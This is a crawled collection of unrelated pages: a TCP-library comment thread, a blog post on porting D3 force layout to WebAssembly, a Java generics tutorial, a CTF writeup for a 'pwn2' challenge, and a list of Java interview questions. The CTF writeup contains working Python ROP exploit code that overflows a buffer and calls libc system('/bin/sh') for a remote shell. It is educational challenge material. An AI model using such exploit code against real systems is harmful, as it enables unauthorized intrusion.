appear. If you find one, please feel free to let me know. I'll fix it and post a new build as I'm able. Thanks, - Pete The following list contains changes in version 1.4.2 of this library: The following list contains changes in version 1.4.1 of this library: The following list contains changes in version 1.4 of this library: The following list contains changes in version 1.3.1 of this library: The following list contains changes in version 1.2 of this library: The following list contains changes in version 1.1 of this library: This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) Private Sub btSend_Click(sender As Object, e As EventArgs) Handles btSend.Click System.Runtime.Serialization.SerializationException occurred HResult=0x8013150C Message=Type 'AbstractTcpClient.MyObjects.MyObject' in Assembly 'VbAbstractTcpClient, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' is not marked as serializable. Source=mscorlib StackTrace: at System.Runtime.Serialization.FormatterServices.InternalGetSerializableMembers(RuntimeType type) at System.Runtime.Serialization.FormatterServices.<>c__DisplayClass9_0.<GetSerializableMembers>b__0(MemberHolder _) at System.Collections.Concurrent.ConcurrentDictionary`2.GetOrAdd(TKey key, Func`2 valueFactory).WriteObjectInfo.Serial AbstractTcpLib.Core.Utilities.Serialize(Object o, Compression deflated) in V:\VisualStudioSource\.NET Sample Code\AbstractTcpLib1.4\AbstractTcpLib\Core.cs:line 375 at AbstractTcpLib.Core.Utilities.CreatePacket(Object serializableObject, AesEncryptor encryptor, Boolean useEncryption, PacketOptions options) in V:\VisualStudioSource\.NET Sample Code\AbstractTcpLib1.4\AbstractTcpLib\Core.cs:line 555 at AbstractTcpLib.Client.SendObject(Object serializableObject, String& errMsg, Boolean blockUntilSent, Socket socket, Boolean encrypt, AesEncryptor localCrypt, Boolean encodeAsArray) in V:\VisualStudioSource\.NET Sample Code\AbstractTcpLib1.4\AbstractTcpLib\Client.cs:line 643 at AbstractTcpLib.Client.Send(Object serializableObject, String& errMsg, Boolean blockUntilSent) in V:\VisualStudioSource\.NET Sample Code\AbstractTcpLib1.4\AbstractTcpLib\Client.cs:line 615 at AbstractTcpClient.frmMain.btSend_Click(Object sender, EventArgs e) in V:\VisualStudioSource\.NET Sample Code\AbstractTcpLib1.4\vb\AbstractTcpClient\AbstractTcpClient\frmMain.vb:line 150 AbstractTcpClient.My.MyApplication.Main(String[] Args) in :line 81 [Serializable] public class MyObj { public int n1 = 0; public int n2 = 0; public String str = null; } private void button1_Click(object sender, EventArgs e) { MyObj thetestobj = new MyObj() ; thetestobj.n1 = 50; thetestobj.n2 = 55; thetestobj.str = "Just Testing"; String errMsg = ""; if (!client.Send(thetestobj, out errMsg)) { MessageBox.Show(errMsg, "Send failed.", MessageBoxButtons.OK, MessageBoxIcon.Error); } } if(options.dataFormat == PacketOptions.DataFormat.SerializedData) { hdo.comm = new CommData(o, ref buffer, buffer.Length); options = null; } else namespace MyObjects { [Serializable] public class MyObj { public int n1 = 0; public int n2 = 0; public String str = null; } } // Get our passed object: var xmlo = data.GetObject(); // Your code: if (data.type == typeof(MyObjects.MyObj)) { MyObjects.MyObj obj = (MyObjects.MyObj)data.deSerialized; // Do something with obj here. } General News Suggestion Question Bug Answer Joke Praise Rant Admin Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
https://www.codeproject.com/Articles/1192106/Abstracting-TCP-Communications-and-adding-what-sho
CC-MAIN-2019-04
en
refinedweb
In this blog post I’ll take a look at a real-world application of WebAssembly (WASM), the re-implementation of D3 force layout. The end result is a drop-in replacement for the D3 APIs, compiled to WASM using AssemblyScript (TypeScript). In my previous post on WASM I explored various different techniques for rendering Mandelbrot fractals. In some ways this is the perfect application for the technology, a computationally intensive operation, exposed via a simple interface that operates on numeric types. In this post, I want to start explore slightly less contrived applications of WASM. As someone who is a frequent user of D3, I thought I’d have a go at re-implementing the force layout component. My goal? - create a drop-in replacement for the D3 APIs, with all the ‘physics’ computation performed using WASM. Rather than implement the entire API, my aim was to port the popular Les Misérables example. Here is the force layout simulation for the above example: var simulation = d3.forceSimulation(graph.nodes) .force("link", d3.forceLink().links(graph.links).id(d => d.id)) .force("charge", d3.forceManyBody()) .force("center", d3.forceCenter(width / 2, height / 2)); And here is the WASM equivalent: var simulation = d3wasm.forceSimulation(graph.nodes, true) .force('link', d3wasm.forceLink().links(graph.links).id(d => d.id)) .force('charge', d3wasm.forceManyBody()) .force('center', d3wasm.forceCenter(width / 2, height / 2)) As you can see, they are identical. You can see the WASM force layout in action here. The sourcecode for this demo is also available on GitHub. AssemblyScript Typically WASM modules are created by compiling languages like C, C++, or Rust using Emscripten. However, in this instance I had a pre-existing JavaScript codebase, so AssemblyScript, which compiles TypeScript to WASM, seemed like a much better option. I was hoping that the migration process would simply involve taking the d3-force code, and sprinkling a few types into the mix. Unfortunately it was a little more complicated than that! Migration of the core algorithms, in this case a many-body, and ‘link’ force simulation, was quite straightforward. Here’s the original code for the link force simulation: function force(alpha) { for (var i = 0, link, source, target, x, y, l, b; i < n; ++i) { link = links[i], source = link.source, target = link.target; x = target.x + target.vx - source.x - source.vx || jiggle(); y = target.y + target.vy - source.y - source.vy || jiggle(); l = Math.sqrt(x * x + y * y); l = (l - distances[i]) / l * alpha * strengths[i]; x *= l, y *= l; target.vx -= x * (b = bias[i]); target.vy -= y * b; source.vx += x * (b = 1 - b); source.vy += y * b; } } And here it is migrated to AssemblyScript: let distance: f64 = 30; export function linkForce(alpha: f64): void { for (let i: i32 = 0; i < linkArray.length; i++) { const link: NodeLink = linkArray[i]; let dx: f64 = link.target.x + link.target.vx - link.source.x - link.source.vx; let dy: f64 = link.target.y + link.target.vy - link.source.y - link.source.vy; const length: f64 = sqrt(dx * dx + dy * dy); const strength: f64 = 1 / min(link.target.links, link.source.links); const deltaLength: f64 = (length - distance) / length * strength * alpha; dx = dx * deltaLength; dy = dy * deltaLength; link.target.vx = link.target.vx - dx * link.bias; link.target.vy = link.target.vy - dy * link.bias; link.source.vx = link.source.vx + dx * (1 - link.bias); link.source.vy = link.source.vy + dy * (1 - link.bias); } } As you can see, this is very similar and the migration of algorithms was straightforward. By far the most complicated part of the migration process was actually getting the data (nodes and links) into the WASM code … WASM Module Interface You can export functions from WASM modules allowing them to be invoked by your JavaScript code, and you can also import JavaScript functions so that they can be invoked from WASM. Unfortunately WASM only supports four types (all numeric), so you cannot simply provide the force layout algorithm with an array of links and nodes. In order to pass more complex data types, you have to (1) write the data to the WASM module linear memory from the hosting JavaScript, then (2) read the data from your WASM code. As AssemblyScript is a subset of TypeScript it provides an interesting way of achieving this … The D3 force layout simulation manipulates an array of nodes. These can be represented as classes within AssemblyScript: export class Node { x: f64; y: f64; vx: f64; vy: f64; links: f64 = 0; static size: i32 = 4; static read(node: Node, buffer: Float64Array, index: i32): Node { node.x = buffer[index * Node.size]; node.y = buffer[index * Node.size + 1]; node.vx = buffer[index * Node.size + 2]; node.vy = buffer[index * Node.size + 3]; return node; } static write(node: Node, buffer: Float64Array, index: i32): Node { buffer[index * Node.size] = node.x; buffer[index * Node.size + 1] = node.y; buffer[index * Node.size + 2] = node.vx; buffer[index * Node.size + 3] = node.vy; return node; } } The above code defines a node with a location ( x, y), and velocity components ( vx, vy), it also defines static functions for reading / writing the node to a Float64Array. The following class handles reading / writing this array of nodes to module memory: class NodeArraySerialiser { array: Float64Array; count: i32; initialise(count: i32): void { this.array = new Float64Array(count * Node.size); this.count = count; } read(): Array<Node> { let typedArray: Array<Node> = new Array<Node>(this.count); for (let i: i32 = 0; i < this.count; i++) { typedArray[i] = Node.read(new Node(), this.array, i); } return typedArray; } write(typedArray: Array<Node>): void { for (let i: i32 = 0; i < this.count; i++) { Node.write(typedArray[i], this.array, i); } } } The module exports functions that allow the serialiser to be initialised from the hosting JavaScript code, allowing it to set the node array length (which initialises the Float64Array), obtain a reference to this array, and instruct the module to read from this array: let serializer = new NodeArraySerialiser(); let nodeArray: Array<Node>; export function setNodeArrayLength(count: i32): void { serializer.initialise(count); } export function getNodeArray(): Float64Array { return serializer.array; } export function readFromMemory(): void { nodeArray = serializer.read(); } The following code snippet shows how the JavaScript code that uses this module can pass the node data via this node array: import { Node } from '../wasm/force'; const nodes = [ {x: 34, y: 25}, {x: 12, y: 22}, ... ] // initialise the wasm module memory wasmModule.setNodeArrayLength(nodes.length); const nodeBuffer = wasmModule.getNodeArray(); // write the node data nodes.forEach((node, index) => Node.write(node as Node, nodeBuffer, index)); // instruct the wasm module to read the nodes wasmModule.readFromMemory(); Because AssemblyScript is valid TypeScript, the above code re-uses the Node class which has the static methods for reading / writing nodes to array buffers! To achieve this, the build compiles the WASM module code twice, once with the TypeScript compiler, and once with the AssemblyScript compiler (more on this later). The above code shows how nodes are passed from JavaScript to the WASM module. Once the WASM code has updated the nodes (positions and velocities) the same happens in reverse, i.e. WASM writes. The following utility function executes any WASM function, surrounding it in the required read / write of nodes: const executeWasm = (wasmCode) => { // write the nodes to the WASM linear memory let nodeBuffer = computer.getNodeArray(); nodes.forEach((node, index) => Node.write(node as Node, nodeBuffer, index)); // read the values form linear memory computer.readFromMemory(); wasmCode(); // write back any updates computer.writeToMemory(); // read back into the JS node array nodeBuffer = computer.getNodeArray(); nodes.forEach((node, index) => Node.read(node as Node, nodeBuffer, index)); }; Working with AssemblyScript AssemblyScript is a subset of TypeScript, which means it only supports a subset of the language features. As an example, it doesn’t support interfaces, or the declaration of functional types. AssemblyScript includes a number of built-in maths functions (min, sqrt, …) which are built-in WebAssembly operators. However, there are a number of omissions, e.g. PI, sin, cos. For these, you either have to explore JavaScript implementations to your AssemblyScript code (which feels quite messy), or implement them using AssemblyScript primitives. Another interesting notable difference between AssemblyScript and TypeScript is the array class. The AssemblyScript array interface implements a small subset of the TypeScript functionality. The reason for this is quite simple, WASM doesn’t have an array type. In order to provide this functionality AssemblyScript has a small standard library which implements these features. You can see the array implementation in the sourcecode, notice the use of malloc, which is part of the lightweight runtime for AssemblyScript that becomes part of the module. Compiling to TypeScript A really interesting feature of AssemblyScript is that you can run the same code through the TypeScript compiler. You do have to provide implementations of the AssemblyScript floating point operators. Thankfully, the JavaScript equivalents just slot straight in … window.sqrt = Math.sqrt; window.min = Math.min; ... One difference with the TypeScript output is that when you return a Float64Array from your module you actually get the array, whereas with WASM the compiled function returns an integer which indicates the location of the array in memory. In order to resolve the differences in the module interface when compiled to JavaScript or WASM, I created a simple proxy that adapted the WASM module, giving both the same interface: new Proxy(wasm, { get: (target, name) => { if (name === 'getNodeArray') { return () => { const offset = wasm.getNodeArray(); return new Float64Array(wasm.memory.buffer, offset + 8, wasm.getNodeArrayLength() * Node.size); }; } else if (name === 'getLinkArray') { return () => { const offset = wasm.getLinkArray(); return new Uint32Array(wasm.memory.buffer, offset + 8, wasm.getLinkArrayLength() * NodeLink.size); } } else { return target[name]; } } }) This converts the integer ‘pointers’ returned by WASM into typed arrays. Notice that the offset provided by the WASM module needs to have the magic number 8 added to it. This relates to the AssemblyScript array implementation, where the first few bytes are used to store the capacity and length before the array contents itself. Being able to run the same code as both JavaScript (via TypeScript) and WASM is great for debugging, I found quite a few errors that in my module code that would have been really hard to track down if I only had access to the compiled module. Although of course, there are further differences at runtime, for example, AssemblyScript types default to zero, whereas in TypeScript / JavaScript they default to undefined. Currently the choice between WASM or JavaScript is exposed as a boolean argument on the simulation. Setting it to false will run the JavaScript module: var simulation = d3wasm.forceSimulation(graph.nodes, false) Bundling One final thing I looked at was how WASM modules could be bundled. Most WASM examples load the WebAssembly binary over HTTP via the fetch API. This is not ideal for distribution of mixed WASM / JavaScript modules. In order to bundle the two together I wrote a simple rollup plugin that base64 encodes the WASM module, and embeds it as a string. With this plugin included in the rollup config, imported WASM modules are returned as a promise which returns the module instance: import wasmCode from '../../build/force.wasm'; export const loaded = wasmCode() .then(instance => { // do something: }); The reason they return promises is because WASM compilation is not performed on the main thread to avoid locking the UI. This does of course have an impact on consumers of this code, they too have to wait for the WASM code to be compiled. As a result, my force layout API exposes a loaded promise, which is used as follows: d3wasm.loaded .then(() => { const simulation = d3wasm.forceSimulation(graph.nodes, true) .force('charge', d3wasm.forceManyBody()) .force('center', d3wasm.forceCenter(width / 2, height / 2)) .force('link', d3wasm.forceLink().links(graph.links).id(d => d.id)); }); Conclusions Most people are currently focussing on the use of WebAssembly to bring performance critical code from other languages to the web. This is certainly a useful application of the technology. However, I think that AssemblyScript (and TurboScript, speedy.js) demonstrate that we could be doing a lot more with this technology. If at some point in the future you could easily compile your JavaScript code to WASM, and enjoy improved load / parse times and performance, why wouldn’t you? We’re clearly not there yet, porting JavaScript to AssemblyScript is not straightforward - however, this technology is very much in its infancy. Remember, the full sourcecode for this demo is available on GitHub.
https://blog.scottlogic.com/2017/10/30/migrating-d3-force-layout-to-webassembly.html
CC-MAIN-2019-04
en
refinedweb
Generics is confusing (in fact one of the most confusing concepts of Java); and on top of it, wildcards (bounds) is even more confusing. That explains, the reason for this dedicated post :) In the Generics post; I discussed that subtyping doesn't work with Generics. So, If Apple extends Fruit; list of Apple is not a subtype of list of Fruit. Does it mean that Generics can't be generic and you can't write a method which work for subtype? Luckily, wildcard helps you make Generics really generic. Bounded Wildcard Generics uses a wildcard character (?) to work with subtype. Let's go in detail on each. upper-bounded wildcard: uses wildcard(?), followed by extends keyword, followed by its upper bound. List<? extends Number> will work for List of Number and list of its subtype (Integer, Double and Float). List<Integer> li = new ArrayList<Integer>(); List<? extends Number> list = li; lower-bounded wildcard: uses wildcard, followed by super keyword, followed by its lower bound. List<? super Integer> will work for list of Integer, list of Number and list of Object. List<Number> ln = new ArrayList<Number>(); List<? super Integer> list1=ln; Unbounded Wildcard Using just the wildcard i.e. ? makes it unbounded. It means anything, so equivalent to using raw type. <?> says that; i wrote code keeping in mind Generics, but it can hold any type. List<?> is a non raw list of some specific type but we don't know what the type is. You can't pass any type. So the type is unknown but it doesn't mean that it can take any shit! List<Integer> li2 = new ArrayList<Integer>(); List<?> l3 = li2; Code Talk Time to walk the talk through a simple example. import java.util.ArrayList; import java.util.List; /** * Defines Base class Fruit and sub classes Apple and FujiApple. * Uses BoundsGenericsTest for testing wildcard. * Save it as BoundsGenericsTest.java * * @author Siddheshwar * */ class Fruit { protected String name; public Fruit(String name) { super(); this.name = name; } public String toString() { return name; } } class Apple extends Fruit { public Apple(String name) { super(name); } } class FujiApple extends Apple { public FujiApple(String name) { super(name); } } public class BoundsGenericsTest { List<? extends Fruit> list; public void add(List<? extends Fruit> f) { list = f; } public static void main(String[] args) { BoundsGenericsTest obj = new BoundsGenericsTest(); List<Apple> apples = new ArrayList<Apple>(); apples.add(new Apple("apple1")); apples.add(new Apple("apple2")); obj.add(apples); System.out.println(" list of Apples: " + obj.list); List<FujiApple> fujiApples = new ArrayList<FujiApple>(); fujiApples.add(new FujiApple("fujiapple1")); fujiApples.add(new FujiApple("fujiapple2")); obj.add(fujiApples); System.out.println(" list of FujiApples : " + obj.list); List<? super FujiApple> another = (List<? super FujiApple>) obj.list; System.out.println(" val :" + another); List<? super FujiApple> another1 = fujiApples; System.out.println(" val :" + another); //unbounded wildcard List<?> fruits = apples; System.out.println("Fruits:" + fruits); } } Output: list of Apples: [apple1, apple2] list of FujiApples : [fujiapple1, fujiapple2] val :[fujiapple1, fujiapple2] val :[fujiapple1, fujiapple2] Fruits:[apple1, apple2] Related Post : Java Generics
http://geekrai.blogspot.com/2014/06/wildcard-in-generics.html
CC-MAIN-2019-04
en
refinedweb
pwn2 - 120 (Pwning) Writeup by r3ndom_ Created: 2015-12-08 Problem This one is a bit more complicated...nc pwn.problem.sctf.io 1338 Flag is in flag.txt Hint It runs on the same box as pwn1. Answer Overview The binary for pwn2 contains no imports for system and as such we can't spawn a shell with that. This means we have to turn to pwn1 to get the addresses of system and "/bin/sh" in libc. Details The buffer is yet again at an offset of 0x2c from the location that will be returned. This means we begin with the same concept. shell_code = 'A'*0x2c Then we find how to change eip to be esp. First find a push esp, the opcode for this instuction is 0xff 0xf4. We can use the 0xff 0xf4 from _start that is part of the call to __libc_start_main. The next instructions are all xchg ax, ax. This is effectively a nop and is used by gcc for spacing. Then theres a function that returns without changing the stack. Perfect, our code will fall through from there. shell_code += '\xd0x83\x04\x08' There we go, that'll call anything we put past this point. Now we write a little bit of shellcode to call system. shell_code += "" print shell_code Now we just pipe that in to the pwn1 server to get a call of any system instruction that can be "/bin/sh" to spawn us a shell. After this go to the tmp directory so you can use gdb (it only works with file write perms), and wget pwn2. Then you can execute gdb on pwn2 and do: b main r p system find &system,+999999,"/bin/sh" This will find you the addresses you need to ROP pwn2. Now you can build an exploit for pwn2. import struct def gen_ptr(a): return struct.pack("<L", a) rop = 'A'*0x2c # system address rop += gen_ptr(0xb7e67190) # filler rop += 'wow_' # "/bin/sh" address rop += gen_ptr(0xb7e5a1e0) print rop Now just cat <(python rop.py) - | nc pwn.problem.sctf.io 1338 and you can use the shell on pwn2 to cat flag.txt. Flag flag{p0pp1ng_sh3ll_thr0ugh_libc}
https://sctf.ehsandev.com/pwn/pwn2.html
CC-MAIN-2019-04
en
refinedweb
Arduino Projects | Raspberry Pi | Electronic Circuits | AVR | PIC | 8051 | Electronic Projects The scrolling display boards are the most attractive among all kind of display boards. They are widely used in advertisements, used in public transport vehicles, used as information boards in railway station, airport etc. They are commonly made of LEDs or LCD screen and are usually connected to a computer or a simple microcontroller which can send the data to the screen. The microcontroller can send data to the screen using its serial port. The data could be saved in the microcontroller itself or it is received from a PC. The serial communication port is the one of the most effective communication method available with a microcontroller. The serial port of the microcontroller provides the easiest way by which the user PC and the microcontroller can write their data in the same medium and both can read each other’s data. A normal LCD module found in the embedded system devices can be made as a scrolling display. It can respond to built-in scrolling commands which make the LCD scrolling possible. It is possible to connect the serial port of the PC with the LCD module through the Arduino board. In such a system the user can send the data from the PC to the Arduino’s serial port using software running in the PC, and can view the same data in the LCD module connected to the Arduino board and that in a scrolling manner if the necessary statements are written in the code.. This project uses function for accessing LCD module available from the library <LiquidCrystal.h> as explained in the previous project on how to interface the 4 bit LCD with Arduino board. The serial communication functions are also used in this project which is already discussed in a previous project on how to receive and send serial data using Arduino. Apart from those functions this project make use of two more functions for the LCD namely lcd.write() and lcd.autoscroll() the details of them are discussed in the following section. lcd.write() Thelcd.write() also a function which is used to print the data to the LCD screen like the lcd.print() function does. Unlike the lcd.print() function the lcd.write() function directly write the value to the LCD screen without formatting it as ASCII. This function is analogues to the Serial.write() function discussed in the project how to receive and send serial data using Arduino. lcd.autoscroll() This function is called after initializing the LCD module using the lcd.begin() function and after setting the cursor position using the lcd.setCursor() function. This function make the scrolling possible by shifting the current displayed data to either side of the LCD as each characters are written into the LCD screen. THE CODE The code initializes the LCD library as per the connection of the LCD with the Arduino board using the function LiquidCrystallcd(). The function lcd.begin() is used to initialize the LCD module in four bit mode with two line display. The lcd.setCursor() function is used to set the cursor at the 16th position of the second line of the 16*2 LCD from where the scrolling is supposed to start. The serial port is initialized with 9600 baud rate using the function Serial.begin(). The function Serial.available() is used in the code to check whether a serial data is available to read or not. The Serial.read() function is used to read the serial data coming from the PC which is then stored to a variable and is displayed on the LCD using the function lcd.write(). // include the library code: #include <LiquidCrystal.h> // initialize the library with the numbers of the interface pins LiquidCrystallcd(12, 11, 5, 4, 3, 2); // give the pin a name: int led = 6; // incoming byte charinByte; void setup() { // initialize the led pin as an output. pinMode(led, OUTPUT); // set up the LCD's number of columns and rows: lcd.begin(16, 2); // initialize the serial communications: Serial.begin(9600); // set the cursor to (16,1): lcd.setCursor(16,1); // set the display to automatically scroll: lcd.autoscroll(); } void loop() // if we get a valid byte, read analog ins: if(Serial.available()) { // get incoming byte: inByte = Serial.read(); // send the same character to the LCD lcd.write(inByte); // glow the LED digitalWrite(led, HIGH); delay(200); } else digitalWrite(led, LOW); Whenever a key is pressed in the keyboard the code receives the data byte and sends the same byte to display it in the LCD screen after shifting the current display to one side.
https://www.engineersgarage.com/embedded/arduino/how-to-make-lcd-scrolling-display-using-arduino
CC-MAIN-2019-04
en
refinedweb
hopefully my questions will benefit others. Assume i want to create chop with more than 1 channel as in the example what is the a fine way to do so ?: my try so far : 1.changed to 3 the number of channels : - Code: Select all CPlusPlusCHOPExample::getOutputInfo(CHOP_OutputInfo* info) { // If there is an input connected, we are going to match it's channel names etc // otherwise we'll specify our own. if (info->opInputs->getNumInputs() > 0) { return false; } else { info->numChannels = 3; // Since we are outputting a timeslice, the system will dictate // the numSamples and startIndex of the CHOP data //info->numSamples = 1; //info->startIndex = 0 // For illustration we are going to output 120hz data info->sampleRate = 120; return true; 2. adding private string array variable called "nameList" in the example header. - Code: Select all private: // We don't need to store this pointer, but we do for the example. // The OP_NodeInfo class store information about the node that's using // this instance of the class (like its name). const OP_NodeInfo* myNodeInfo; // In this example this value will be incremented each time the execute() // function is called, then passes back to the CHOP int32_t myExecuteCount; std::string nameList[3] ; double myOffset; Initialize in constructor : - Code: Select all CPlusPlusCHOPExample::CPlusPlusCHOPExample(const OP_NodeInfo* info) : myNodeInfo(info) { myExecuteCount = 0; myOffset = 0.0; nameList[0] = "gal"; nameList[1] = "barak"; nameList[2] = "moshe"; } 3.return the array with the incoming index: - Code: Select all CPlusPlusCHOPExample::getChannelName(int32_t index, void* reserved) { return (nameList[index].c_str()); //return "chan1"; } I did include <string> in the headr too thanks
http://derivative.ca/Forum/viewtopic.php?f=27&t=11949&p=46443&sid=a73d84ab7817a4feb25b9f223a90c806
CC-MAIN-2019-04
en
refinedweb
Advanced Java Interview Questions -16 1. 2. 3. 4. 5.What is error ? A SAX parsing error is generally a validation error; in other words, it occurs when an XML document is not valid, although it can also occur if the declaration specifies an XML version that the parser cannot handle. See also fatal error, warning. 6.What is Extensible Markup Language ? XML. 7.What is external entity ? An entity that exists as an external XML file, which is included in the XML document using an entity reference. 8.What is external subset ? That part of a DTD that is defined by references to external DTD files. 9.What is fatal error ? A fatal error occurs in the SAX parser when a document is not well formed or otherwise cannot be processed. See also error, warning. 10. 11.What is filter chain ? A concatenation of XSLT transformations in which the output of one transformation becomes the input of the next. 12.What is finder method ? A method defined in the Interview Questions – Home interface and invoked by a client to locate an entity bean. 13.What is form-based authentication ? An authentication mechanism in which a Web container provides an application-specific form for logging in. This form of authentication uses Base64 encoding and can expose user names and passwords 14.What is general entity ? An entity that is referenced as part of an XML document’s content, as distinct from a parameter entity, which is referenced in the DTD. A general entity can be a parsed entity or an unparsed entity. 15.What is group ? An authenticated set of users classified by common traits such as job title or customer profile. Groups are also associated with a set of roles, and every user that is a member of a group inherits all the roles assigned to that group. 16.What is handle ? An object that identifies an enterprise bean. A client can serialize the handle and then later deserialize it to obtain a reference to the enterprise bean. 17.What is Interview Questions – Home handle ? An object that can be used to obtain a reference to the Interview Questions – Home interface. A Interview Questions – Home handle can be serialized and written to stable storage and de-serialized to obtain the reference. 18.What is Interview Questions – Home interface ? One of two interfaces for an enterprise bean. The Interview Questions – Home interface defines zero or more methods for managing an enterprise bean. The Interview Questions – Home interface of a session bean defines create and remove methods, whereas the Interview Questions – Home interface of an entity bean defines create, finder, and remove methods. 19.What is Java 2 Platform, Micro Edition (J2ME) ? A highly optimized Java runtime environment targeting a wide range of consumer products, including pagers, cellular phones, screen phones, digital set-top boxes, and car navigation systems. 20.What is Java 2 Platform, Standard Edition (J2SE) ? The core Java technology platform. 21.What is. 22.What is Java API for XML Registries (JAXR) ? An API for accessing various kinds of XML registries. 23.What is Java API for XML-based RPC (JAX-RPC) ? An API for building Web services and clients that use remote procedure calls and XML. 24.What is J2SE ? Abbreviate of Java 2 Platform, Standard Edition. 25.What is JAR ? Java archive. A platform-independent file format that permits many files to be aggregated into one file. 26.What is Java 2 Platform, Enterprise Edition (J2EE) ? An environment for developing and deploying enterprise applications. The J2EE platform consists of a set of services, application programming interfaces (APIs), and protocols that provide the functionality for developing multitiered, Web-based applications. 27.What is Java IDL ? A technology that provides CORBA interoperability and connectivity capabilities for the J2EE platform. These capabilities enable J2EE applications to invoke operations on remote network services using the Object Management Group IDL and IIOP. 28.What is Java Message Service (JMS) ? An API for invoking operations on enterprise messaging systems. 29.What is Java Transaction Service (JTS) ? Specifies the implementation of a transaction manager that supports JTA and implements the Java mapping of the Object Management Group Object Transaction Service 1.1 specification at the level below the API. 30.What is JavaBeans component ? A Java class that can be manipulated by tools and composed into applications. A JavaBeans component must adhere to certain property and event interface conventions. 31.What is JavaMail ? An API for sending and receiving email. 32.What is JavaServer Faces Technology ? A framework for building server-side user interfaces for Web applications written in the Java programming language 33.What is JavaServer Faces conversion model ? A mechanism for converting between string-based markup generated by JavaServer Faces UI components and server-side Java objects. 34.What is JavaServer Faces event and listener model ? A mechanism for determining how events emitted by JavaServer Faces UI components are handled. This model is based on the JavaBeans component event and listener model. 35.What is Java Transaction API (JTA) ? An API that allows applications and J2EE servers to access transactions. 36.What is JavaServer Faces UI component ? A user interface control that outputs data to a client or allows a user to input data to a JavaServer Faces application. 37.What is JavaServer Faces UI component class ? A JavaServer Faces class that defines the behavior and properties of a JavaServer Faces UI component. 38.What is Java Naming and Directory Interface (JNDI) ? An API that provides naming and directory functionality. 39.What is Java Secure Socket Extension (JSSE) ? A set of packages that enable secure Internet communications. 40.What is JAXR client ? A client program that uses the JAXR API to access a business registry via a JAXR provider. 41.What is. 42. 43.What is JMS ? Java Message Service. 44.What is JMS administered object ? A preconfigured JMS object (a resource manager connection factory or a destination) created by an administrator for the use of JMS clients and placed in a JNDI namespace. 45.What is JMS application ? One or more JMS clients that exchange messages. 46.What is JAXR provider ? An implementation of the JAXR API that provides access to a specific registry provider or to a class of registry providers that are based on a common specification. 47.What is JDBC ? An JDBC for database-independent connectivity between the J2EE platform and a wide range of data sources. 48.What is JavaServer Faces validation model ? A mechanism for validating the data a user inputs to a JavaServer Faces UI component. 49.What is JMS client ? A Java language program that sends or receives messages. 50.What is JMS provider ? A messaging system that implements the Java Message Service as well as other administrative and control functionality needed in a full-featured messaging product. 51.What is JSP expression ? A scripting element that contains a valid scripting language expression that is evaluated, converted to a String, and placed into the implicit out object. 52.What is JSP expression language ? A language used to write expressions that access the properties of JavaBeans components. EL expressions can be used in static text and in any standard or custom tag attribute that can accept an expression. 53.What is JSP standard action ? An action that is defined in the JSP specification and is always available to a JSP page. 54. 55.What is JSP page ? A text-based document containing static text and JSP elements that describes how to process a request to create a response. A JSP page is translated into and handles requests as a servlet. 56”. 57.What is JSP scriptlet ? A JSP scripting element containing any code fragment that is valid in the scripting language used in the JSP page. The JSP specification describes what is a valid scriptlet for the case where the language page attribute is “java”. 58.What is local subset ? That part of the DTD that is defined within the current XML file. 59.What is managed bean creation facility ? A mechanism for defining the characteristics of JavaBeans components used in a JavaServer Faces application. 60.What is JTA ? Abbreviate of Java Transaction API. 61.What is JSP tag file ? A source file containing a reusable fragment of JSP code that is translated into a tag handler when a JSP page is translated into a servlet. 62.What is JSP tag handler ? A Java programming language object that implements the behavior of a custom tag. 63.What is JSP tag library ? A collection of custom tags described via a tag library descriptor and Java classes. 64.What is JSTL ? Abbreviate of JavaServer Pages Standard Tag Library. 65.What is JTS ? Abbreviate of Java Transaction Service. 66.What is keystore ? A file containing the keys and certificates used for authentication 67. 68. 69.What is message consumer ? An object created by a JMS session that is used for receiving messages sent to a destination. 70.What is. 71.What is message producer ? An object created by a JMS session that is used for sending messages to a destination. 72.What is mixed-content model ? A DTD specification that defines an element as containing a mixture of text and one more other elements. The specification must start with #PCDATA, followed by diverse elements, and must end with the “zero-or-more” asterisk symbol (*). 73.What is mutual authentication ? An authentication mechanism employed by two parties for the purpose of proving each other’s identity to one another. 74.What is should be interpreted according to your DTD rather than using the definition for an element in a different DTD. 75.What is naming context ? A set of associations between unique, atomic, people-friendly identifiers and objects. 76.What is parameter entity ? An entity that consists of DTD specifications, as distinct from a general entity. A parameter entity defined in the DTD can then be referenced at other points, thereby eliminating the need to recode the definition at each location it is used. 77.What is parsed entity ? A general entity that contains XML and therefore is parsed when inserted into the XML document, as opposed to an unparsed entity. 78.What is. 79.What is. 80.What is North American Industry Classification System (NAICS) ? A system for classifying business establishments based on the processes they use to produce goods or services. 81.What is notation ? A mechanism for defining a data format for a non-XML document referenced as an unparsed entity. This is a holdover from SGML. A newer standard is to use MIME data types and namespaces to prevent naming conflicts. 82.What is method-binding expression ? A Java Server Faces EL expression that refers to a method of a backing bean. This method performs either event handling, validation, or navigation processing for the UI component whose tag uses the method-binding expression. 83.What is method permission ? An authorization rule that determines who is permitted to execute one or more enterprise bean methods. 84.What is OASIS ? Organization for the Advancement of Structured Information Standards. A consortium that drives the development, convergence, and adoption of e-business standards. 85.What is OMG ? Object Management Group. A consortium that produces and maintains computer industry specifications for interoperable enterprise applications. 86.What is one-way messaging ? A method of transmitting messages without having to block until a response is received. 87.What is ORB ? Object request broker. A library that enables CORBA objects to locate and communicate with one another. 88.What is OS principal ? A principal native to the operating system on which the J2EE platform is executing. 89.What is OTS ? Object Transaction Service. A definition of the interfaces that permit CORBA objects to participate in transactions. 90.What is. 91.What is passivation ? The process of transferring an enterprise bean from memory to secondary storage. See activation. 92.What is persistence ? The protocol for transferring the state of an entity bean between its instance variables and an underlying database. 93.What is persistent field ? A virtual field of an entity bean that has container-managed persistence; it is stored in a database. 94.What is primary key ? An object that uniquely identifies an entity bean within a home. 95.What is principal ? The identity assigned to a user as a result of authentication. 96.What is privilege ? A security attribute that does not have the property of uniqueness and that can be shared by many principals. 97.What is POA ? Portable Object Adapter. A CORBA standard for building server-side applications that are portable across heterogeneous ORBs. 98.What is point-to-point messaging system ? A messaging system built on the concept of message queues. Each message is addressed to a specific queue; clients extract messages from the queues established to hold their messages. 99.What is processing instruction ? Information contained in an XML structure that is intended to be interpreted by a specific application. 100.What is programmatic security ? Security decisions that are made by security-aware applications. Programmatic security is useful when declarative security alone is not sufficient to express the security model of an application. 101.What is prolog ? The part of an XML document that precedes the XML data. The prolog includes the declaration and an optional DTD. 102. 